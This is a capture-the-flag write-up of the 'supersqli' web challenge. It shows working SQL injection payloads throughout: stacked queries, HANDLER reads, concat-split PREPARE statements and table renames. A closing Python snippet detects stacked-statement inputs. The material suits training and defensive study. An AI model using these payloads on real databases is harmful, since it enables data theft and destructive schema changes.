Advanced area of attack and defense world web masters supersqli
2022-07-29 00:17:00 【Ant200】
Tip: there are countless methods; the best one is the one that suits you!
Tools
Firefox
Analysis
Look at the challenge: the name supersqli and the page content both suggest SQL injection.
1. Input 1; the parameter turns out to be injectable.

2. View the page source; a hint says that sqlmap has no soul, so this is not meant to be run with sqlmap. Try manual injection.
3. Input
1' union select 1--+
The response says the input is filtered (by preg_match, which you can look up yourself). With this filter in place the select command cannot be used.

4. Try stacked injection
Stacked injections: from the name alone it should be a stack of SQL statements (several of them) executed together, and that is exactly how it works in practice. We know that in MySQL, mainly on the command line, each statement is terminated with a ; . From this we can think about whether several statements can be submitted together. This is called stacked injection.
Command:
1';show databases; --+
5. Enumerate the databases; from the challenge name it should be supersqli. Querying the tables in it gives two tables.

6. Query the columns of the table
Note:
1. Both statements must be followed by a semicolon
2. Names such as the table name below must be enclosed in backquotes (the key under Esc on an English keyboard)
Command:
-1';show columns from `1919810931114514`;--+
This gives the flag field; select is unavailable, so try something else.
Method 1: Use handler
Commands:
handler `1919810931114514` open  -- open this table
handler `1919810931114514` read first  -- read the table row by row, starting with the first
-1'; handler `1919810931114514` open ; handler `1919810931114514` read first; --+
Get the flag

View the page source and copy it

Method 2:
Prepared statements + stacked injection
Prepared statements: MySQL's precompilation feature, meant for SQL statements whose structure stays the same and that are executed frequently. Every SQL statement has to be compiled by the database before it runs, and that step is quite time-consuming; with one or two statements you may not notice, but with thousands the difference in efficiency is obvious. The mechanism MySQL provides lets a SQL statement with a fixed structure be precompiled in the database; afterwards we only pass in the variable parameters each time we execute it, the compilation step is skipped, and the efficiency gain is very clear. See the link for a deeper understanding.
Statements:
SET @tn = 'hahaha';  -- store the table name
SET @sql = concat('select * from ', @tn);  -- store the SQL statement
PREPARE name from @sql;  -- prepare the SQL statement
EXECUTE name;  -- execute the prepared SQL statement
(DEALLOCATE | DROP) PREPARE sqla;  -- delete the prepared SQL statement
Command: split select into pieces and splice them back together with concat; ASCII codes can also be used instead.
;SET @sql=concat('s','elect', '* from `1919810931114514`'); PREPARE a from @sql; EXECUTE a;
Get the flag

Method 3:
Use the rename and alter commands to change the table name and field name. We can reach the columns inside words and find id, which means that when we input 1 the page queries the words table by default. So we can rename the words table to words1, rename the 1919810931114514 table to words, then change the flag field inside 1919810931114514 to id, and input 1' or 1=1# to get the flag.
Construct the commands:
rename tables `words` to `words1`;  -- give the original words table another name
rename tables `1919810931114514` to `words`;  -- rename the table holding the flag to words
alter table `words` change `flag` `id` varchar(100);  -- rename the field and set its length
1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
Successful execution

Query the flag
Related links:
Stacked injection details (reprint) - Good mentality (*▽*) - Blog Garden (cnblogs)
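All three methods above depend on stacking a second statement behind the lookup query, and Method 2 additionally rebuilds a blacklisted keyword with concat(). As an added example that is not part of the original writeup, the following Python flags both shapes in request parameter values; the sample inputs are constructed copies of the payloads shown on this page plus two benign values, and a real fix replaces the preg_match blacklist with parameter binding rather than relying on a check like this.

```python
import re

# Constructed sample inputs for the challenge's `inject` parameter: the first
# four are copies of the payloads shown in this writeup, the last two are
# values an ordinary user of a word-lookup page might send.
SAMPLE_INPUTS = [
    "1';show databases; --+",
    "-1'; handler `1919810931114514` open ; handler `1919810931114514` read first; --+",
    ";SET @sql=concat('s','elect', '* from `1919810931114514`'); PREPARE a from @sql; EXECUTE a;",
    "1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;"
    " alter table `words` change `flag` `id` varchar(100);#",
    "1",
    "O'Reilly",
]

# Statement keywords that a lookup endpoint never needs after a ';' but that
# the writeup uses once a second statement can be stacked behind the first.
STACKED_KEYWORDS = r"(show|handler|prepare|execute|set|rename|alter|deallocate|drop)"

# Indicator 1: a statement terminator followed by one of those keywords,
# i.e. a stacked statement. No quote is required before the ';', because the
# prepare payload above starts directly with ';'.
STACKED_RE = re.compile(r";\s*" + STACKED_KEYWORDS + r"\b", re.IGNORECASE)

# Indicator 2: a keyword reassembled from string fragments via concat(),
# which is how 'select' is rebuilt past the preg_match blacklist.
CONCAT_SPLIT_RE = re.compile(r"concat\s*\(\s*'[^']*'\s*,\s*'[^']*'", re.IGNORECASE)


def classify(value):
    """Return the list of stacked-injection indicators found in one input."""
    hits = []
    if STACKED_RE.search(value):
        hits.append("stacked_statement")
    if CONCAT_SPLIT_RE.search(value):
        hits.append("keyword_reassembly")
    return hits


def scan(values):
    """Map every flagged input to its indicators; clean inputs are omitted."""
    return {v: classify(v) for v in values if classify(v)}


if __name__ == "__main__":
    for value, hits in scan(SAMPLE_INPUTS).items():
        print(f"{hits}: {value[:60]}")
```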